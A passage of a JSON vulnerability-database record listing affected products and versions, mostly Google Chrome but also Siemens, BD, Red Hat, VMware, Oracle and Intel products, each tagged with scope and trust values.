"vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1183.0" }, { "model": "sinumerik tcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "30.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.217" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491036" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.522.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.23" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "sinumerik d sl ncu720.3b", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "61.0.3163.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.159" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.152.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.556.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.161" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.772.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1059.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.398.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.140" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.321" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.870.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1006.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1653.1" }, { "model": "pyxis anesthesia es", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.204" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.58" }, { "model": "enterprise linux for power little endian extended update supp", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1083.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "62.0.3202.89" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.301" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.335" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.695.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1021" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.325" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.732.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.26" }, { "model": "vcloud usage meter", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.712.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.558.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.2" }, { "model": "simatic ipc827c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.822.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.665.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.629.0" }, { "model": "sql server r2 for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "200830" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.339" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.763.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.947.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1276.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.878.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.42" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.542.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.837.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1014" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.70" }, { "model": "simatic ipc847d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.324" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.929.0" }, { "model": "simatic ipc547g", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.510.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.1549" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.410.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.787.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.323" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.405.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.796.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.153.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.35" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.134.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1076.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.757.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "facscelesta", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.20" }, { "model": "enterprise linux for ibm z systems extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-6.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.832.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1066.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.316" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.514.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.221.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.403.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.55" }, { "model": "simatic field pg m5", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "43.0.2357" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1018.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.229" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.139" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1282.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.303.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3" }, { "model": "pyxis scrubstation system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.20" }, { "model": "pyxis anesthesia system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "35000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.436.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1030.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.44" }, { "model": "xeon cpu e5-1650", "scope": "eq", "trust": 0.3, "vendor": "intel", "version": "v30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.340" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1689.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.679.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.300" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.644.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.70" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.173" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.17" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.313.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.2" }, { "model": "chrome", "scope": "eq", "trust": 